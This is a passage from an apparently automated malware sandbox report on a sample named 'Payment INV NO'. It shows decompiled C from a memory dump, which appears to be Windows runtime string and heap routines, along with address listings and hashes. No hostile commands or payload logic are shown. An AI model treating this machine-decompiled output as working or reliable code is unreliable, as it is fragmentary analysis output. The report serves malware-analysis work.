													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17711c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = E017B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E017DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E017DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017952A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E017AEB70(1, 0x18879a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E017AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017D95D0();
																			E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E017DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E017D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E017DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                          0x017b4128
                                                          0x017b4135
                                                          0x017b413c
                                                          0x017b4141
                                                          0x017b4145
                                                          0x017b4147
                                                          0x017b414e
                                                          0x017b4151
                                                          0x017b4159
                                                          0x017b415c
                                                          0x017b4160
                                                          0x017b4164
                                                          0x017b4168
                                                          0x017b416c
                                                          0x017b417f
                                                          0x017b4181
                                                          0x017b446a
                                                          0x017b446a
                                                          0x017b418c
                                                          0x017b4195
                                                          0x017b4199
                                                          0x017b4432
                                                          0x017b4439
                                                          0x017b443d
                                                          0x017b4442
                                                          0x017b4447
                                                          0x00000000
                                                          0x017b419f
                                                          0x017b41a3
                                                          0x017b41b1
                                                          0x017b41b9
                                                          0x017b41bd
                                                          0x017b45db
                                                          0x017b45db
                                                          0x00000000
                                                          0x017b41c3
                                                          0x017b41c3
                                                          0x017b41ce
                                                          0x017b41d4
                                                          0x017fe138
                                                          0x017fe13e
                                                          0x017fe169
                                                          0x017fe16d
                                                          0x017fe19e
                                                          0x017fe16f
                                                          0x017fe16f
                                                          0x017fe175
                                                          0x017fe179
                                                          0x017fe18f
                                                          0x017fe193
                                                          0x00000000
                                                          0x017fe199
                                                          0x00000000
                                                          0x017fe199
                                                          0x017fe193
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b41da
                                                          0x017b41da
                                                          0x017b41df
                                                          0x017b41e4
                                                          0x017b41ec
                                                          0x017b4203
                                                          0x017b4207
                                                          0x017fe1fd
                                                          0x017b4222
                                                          0x017b4226
                                                          0x017fe1f3
                                                          0x017fe1f3
                                                          0x017b422c
                                                          0x017b422c
                                                          0x017b4233
                                                          0x017fe1ed
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b4239
                                                          0x017b4239
                                                          0x017b4239
                                                          0x017b4239
                                                          0x017b4233
                                                          0x017b4226
                                                          0x017b41ee
                                                          0x017b41ee
                                                          0x017b41f4
                                                          0x017b4575
                                                          0x017fe1b1
                                                          0x017fe1b1
                                                          0x00000000
                                                          0x017b457b
                                                          0x017b457b
                                                          0x017b4582
                                                          0x017fe1ab
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b4588
                                                          0x017b4588
                                                          0x017b458c
                                                          0x017fe1c4
                                                          0x017fe1c4
                                                          0x00000000
                                                          0x017b4592
                                                          0x017b4592
                                                          0x017b4599
                                                          0x017fe1be
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b459f
                                                          0x017b459f
                                                          0x017b45a3
                                                          0x017fe1d7
                                                          0x017fe1e4
                                                          0x00000000
                                                          0x017b45a9
                                                          0x017b45a9
                                                          0x017b45b0
                                                          0x017fe1d1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b45b6
                                                          0x017b45b6
                                                          0x017b45b6
                                                          0x00000000
                                                          0x017b45b6
                                                          0x017b45b0
                                                          0x017b45a3
                                                          0x017b4599
                                                          0x017b458c
                                                          0x017b4582
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b41f4
                                                          0x017b423e
                                                          0x017b4241
                                                          0x017b45c0
                                                          0x017b45c4
                                                          0x00000000
                                                          0x017b45ca
                                                          0x017b45ca
                                                          0x00000000
                                                          0x017fe207
                                                          0x017fe20f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b45d1
                                                          0x00000000
                                                          0x00000000
                                                          0x017b45ca
                                                          0x00000000
                                                          0x017b4247
                                                          0x017b4247
                                                          0x017b4247
                                                          0x017b4249
                                                          0x017b4249
                                                          0x017b4249
                                                          0x017b4251
                                                          0x017b4251
                                                          0x017b4257
                                                          0x017b425f
                                                          0x017b426e
                                                          0x017b4270
                                                          0x017b427a
                                                          0x017fe219
                                                          0x017fe219
                                                          0x017b4280
                                                          0x017b4282
                                                          0x017b4456
                                                          0x017b45ea
                                                          0x00000000
                                                          0x017b45f0
                                                          0x017fe223
                                                          0x00000000
                                                          0x017fe223
                                                          0x017b445c
                                                          0x017b445c
                                                          0x00000000
                                                          0x017b445c
                                                          0x00000000
                                                          0x017b4288
                                                          0x017b428c
                                                          0x017fe298
                                                          0x017b4292
                                                          0x017b4292
                                                          0x017b429e
                                                          0x017b42a3
                                                          0x017b42a7
                                                          0x017b42ac
                                                          0x017fe22d
                                                          0x017b42b2
                                                          0x017b42b2
                                                          0x017b42b9
                                                          0x017b42bc
                                                          0x017b42c2
                                                          0x017b42ca
                                                          0x017b42cd
                                                          0x017b42cd
                                                          0x017b42d4
                                                          0x017b433f
                                                          0x017b433f
                                                          0x017b42d6
                                                          0x017b42d6
                                                          0x017b42d9
                                                          0x017b42dd
                                                          0x017b42eb
                                                          0x017fe23a
                                                          0x017b42f1
                                                          0x017b4305
                                                          0x017b430d
                                                          0x017b4315
                                                          0x017b4318
                                                          0x017b431f
                                                          0x017b4322
                                                          0x017b432e
                                                          0x017b433b
                                                          0x017b433b
                                                          0x00000000
                                                          0x017b432e
                                                          0x017b42eb
                                                          0x017b434c
                                                          0x017b434e
                                                          0x017b4352
                                                          0x017b4359
                                                          0x017b435e
                                                          0x017b4361
                                                          0x017b436e
                                                          0x017b438a
                                                          0x017b438e
                                                          0x017b4396
                                                          0x017b439e
                                                          0x017b43a1
                                                          0x017b43ad
                                                          0x017b43bb
                                                          0x017b43bb
                                                          0x017b43ad
                                                          0x017b436e
                                                          0x017b43bf
                                                          0x017b43c5
                                                          0x017b4463
                                                          0x017b4463
                                                          0x017b43ce
                                                          0x017b43d5
                                                          0x017b43d9
                                                          0x017b43df
                                                          0x017b4475
                                                          0x017b4479
                                                          0x017b4491
                                                          0x017b4491
                                                          0x017b4479
                                                          0x017b43e5
                                                          0x017b43eb
                                                          0x017b43f4
                                                          0x017b43f6
                                                          0x017b43f9
                                                          0x017b43fc
                                                          0x017b43ff
                                                          0x017b44e8
                                                          0x017b44ed
                                                          0x017b44f3
                                                          0x017fe247
                                                          0x00000000
                                                          0x017b44f9
                                                          0x017b4504
                                                          0x017b4508
                                                          0x017b450f
                                                          0x017fe269
                                                          0x00000000
                                                          0x017b4515
                                                          0x017b4519
                                                          0x017b4531
                                                          0x017b4534
                                                          0x017b4537
                                                          0x017b453e
                                                          0x017b4541
                                                          0x017b454a
                                                          0x017fe255
                                                          0x017fe255
                                                          0x017fe25b
                                                          0x017fe25e
                                                          0x017fe261
                                                          0x017fe261
                                                          0x017b4555
                                                          0x017b4559
                                                          0x017b455d
                                                          0x017fe26d
                                                          0x017fe270
                                                          0x017fe274
                                                          0x017fe27a
                                                          0x017fe27d
                                                          0x017fe28e
                                                          0x017fe28e
                                                          0x017b4563
                                                          0x017b4563
                                                          0x017b4569
                                                          0x017b4569
                                                          0x00000000
                                                          0x017b455d
                                                          0x017b450f
                                                          0x00000000
                                                          0x017b44f3
                                                          0x017b43ff
                                                          0x017b4405
                                                          0x017b4405
                                                          0x017b4405
                                                          0x017b42ac
                                                          0x017b428c
                                                          0x017b4282
                                                          0x017b4407
                                                          0x017b440d
                                                          0x017fe2af
                                                          0x017fe2af
                                                          0x017b4413
                                                          0x017b4413
                                                          0x00000000
                                                          0x017b41d4
                                                          0x00000000
                                                          0x017b41c3
                                                          0x017b41bd
                                                          0x017b4415
                                                          0x017b4415
                                                          0x017b4416
                                                          0x017b4417
                                                          0x017b4429
                                                          0x017b416e
                                                          0x017b416e
                                                          0x017b4175
                                                          0x017b4498
                                                          0x017b449f
                                                          0x017fe12d
                                                          0x00000000
                                                          0x017fe133
                                                          0x00000000
                                                          0x017fe133
                                                          0x017b44a5
                                                          0x017b44a5
                                                          0x017b44aa
                                                          0x00000000
                                                          0x017b44bb
                                                          0x017b44ca
                                                          0x017b44d6
                                                          0x017b44d7
                                                          0x017b44d8
                                                          0x017b44e3
                                                          0x017b44e3
                                                          0x017b44aa
                                                          0x017b417b
                                                          0x017b417b
                                                          0x017b417b
                                                          0x00000000
                                                          0x017b417b
                                                          0x017b4175
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e5bc94b275250d08f5ad75736c5b5578eda4e4fd3822ce652591004e4530875
                                                          • Instruction ID: 5b55288cddeea2d7ee8e174dc01d6c3e6417f911b27150c806af55d9f43b84eb
                                                          • Opcode Fuzzy Hash: 7e5bc94b275250d08f5ad75736c5b5578eda4e4fd3822ce652591004e4530875
                                                          • Instruction Fuzzy Hash: 9EF16A706086118FD724CF19C484BBAF7E1AF88714F15496EF5878B3A2EB34D891CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A3D34 Relevance: .4, Instructions: 435COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E017A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E017A1B8F(0x1774808,  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E017A1B8F(0x17747a4,  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E017A1B8F(0x177476c,  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E017A1B8F(0x177472c,  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E017A1B8F(0x17747d8,  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = E017B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E017DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E017E1370(_t276, 0x1774e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E017DBB40(0,  &_v68, _t170);
									if(E017A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E017DBB40(_t257,  &_v68, _t243);
								if(E017A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E017E1370(_t278, 0x1774e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = E017B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E017DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E017E1370(_v16, 0x1774e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E017DBB40(_t262,  &_v68, _t244);
								if(E017A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E017E1370(_t282, 0x1774e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E017DBB40(_t262,  &_v68, _t201);
							if(E017A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = E017B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E017DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E017E1370(_t280, 0x1774e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E017DBB40(_t267,  &_v68, _t245);
							if(E017A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E017E1370(_t284, 0x1774e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E017DBB40(_t267,  &_v68, _t224);
						if(E017A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                          0x017a3d3c
                                                          0x017a3d42
                                                          0x017a3d44
                                                          0x017a3d46
                                                          0x017a3d49
                                                          0x017a3d4c
                                                          0x017a3d4f
                                                          0x017a3d52
                                                          0x017a3d55
                                                          0x017a3d58
                                                          0x017a3d5b
                                                          0x017a3d5f
                                                          0x017a3d61
                                                          0x017a3d66
                                                          0x017f8213
                                                          0x017f8218
                                                          0x017a4085
                                                          0x017a4088
                                                          0x017a408e
                                                          0x017a4094
                                                          0x017a409a
                                                          0x017a40a0
                                                          0x017a40a6
                                                          0x017a40a9
                                                          0x017a40af
                                                          0x017a40b6
                                                          0x017a40bd
                                                          0x017a40bd
                                                          0x017a3d83
                                                          0x017f821f
                                                          0x017f8229
                                                          0x017f8238
                                                          0x017f8238
                                                          0x017f823d
                                                          0x017f823d
                                                          0x017a3da0
                                                          0x017a3daf
                                                          0x017a3db5
                                                          0x017a3dba
                                                          0x017a3dba
                                                          0x017a3dd4
                                                          0x017a3e94
                                                          0x017a3eab
                                                          0x017a3f6d
                                                          0x017a3f84
                                                          0x017a406b
                                                          0x017a406b
                                                          0x017a406e
                                                          0x017a406e
                                                          0x017a4070
                                                          0x017a4074
                                                          0x017f8351
                                                          0x017f8351
                                                          0x017a407a
                                                          0x017a407f
                                                          0x017f835d
                                                          0x017f8370
                                                          0x017f8377
                                                          0x017f8379
                                                          0x017f837c
                                                          0x017f837c
                                                          0x017f835d
                                                          0x00000000
                                                          0x017a407f
                                                          0x017a3f8a
                                                          0x017a3f8d
                                                          0x017a3f90
                                                          0x017a3f95
                                                          0x017f830d
                                                          0x017f830f
                                                          0x017a3f9b
                                                          0x017a3fac
                                                          0x017a3fae
                                                          0x017a3fb1
                                                          0x017a3fb1
                                                          0x017a3fb6
                                                          0x017f8317
                                                          0x017f831a
                                                          0x00000000
                                                          0x017a3fbc
                                                          0x017a3fc1
                                                          0x017a3fc9
                                                          0x017a3fd7
                                                          0x017a3fda
                                                          0x017a3fdd
                                                          0x017a4021
                                                          0x017a4021
                                                          0x017a4029
                                                          0x017a4030
                                                          0x017a4044
                                                          0x017a4046
                                                          0x017a4046
                                                          0x017a4044
                                                          0x017a4049
                                                          0x017f8327
                                                          0x017f8334
                                                          0x017f8339
                                                          0x017f833c
                                                          0x017a404f
                                                          0x017a404f
                                                          0x017a404f
                                                          0x017a4051
                                                          0x017a4056
                                                          0x017a4063
                                                          0x017a4063
                                                          0x017a4068
                                                          0x00000000
                                                          0x017a4068
                                                          0x017a3fdf
                                                          0x017a3fe2
                                                          0x017a3fe4
                                                          0x017a3fe7
                                                          0x017a3fef
                                                          0x017a4003
                                                          0x017a4005
                                                          0x017a4005
                                                          0x017a400c
                                                          0x017a4013
                                                          0x017a4016
                                                          0x017a4017
                                                          0x017a401b
                                                          0x017a401e
                                                          0x00000000
                                                          0x017a401e
                                                          0x017a3fb6
                                                          0x017a3eb1
                                                          0x017a3eb4
                                                          0x017a3eb7
                                                          0x017a3ebc
                                                          0x017f82a9
                                                          0x017f82ab
                                                          0x017a3ec2
                                                          0x017a3ed3
                                                          0x017a3ed5
                                                          0x017a3ed8
                                                          0x017a3ed8
                                                          0x017a3edd
                                                          0x017f82b3
                                                          0x017f82b6
                                                          0x00000000
                                                          0x017a3ee3
                                                          0x017a3ee8
                                                          0x017a3eed
                                                          0x017a3ef0
                                                          0x017a3ef3
                                                          0x017a3f02
                                                          0x017a3f05
                                                          0x017a3f08
                                                          0x017f82c0
                                                          0x017f82c3
                                                          0x017f82c5
                                                          0x017f82c8
                                                          0x017f82d0
                                                          0x017f82e4
                                                          0x017f82e6
                                                          0x017f82e6
                                                          0x017f82ed
                                                          0x017f82f4
                                                          0x017f82f7
                                                          0x017f82f8
                                                          0x017f82fc
                                                          0x017f82ff
                                                          0x017f82ff
                                                          0x017a3f0e
                                                          0x017a3f11
                                                          0x017a3f16
                                                          0x017a3f1d
                                                          0x017a3f31
                                                          0x017f8307
                                                          0x017f8307
                                                          0x017a3f31
                                                          0x017a3f39
                                                          0x017a3f48
                                                          0x017a3f4d
                                                          0x017a3f50
                                                          0x017a3f50
                                                          0x017a3f53
                                                          0x017a3f58
                                                          0x017a3f65
                                                          0x017a3f65
                                                          0x017a3f6a
                                                          0x00000000
                                                          0x017a3f6a
                                                          0x017a3edd
                                                          0x017a3dda
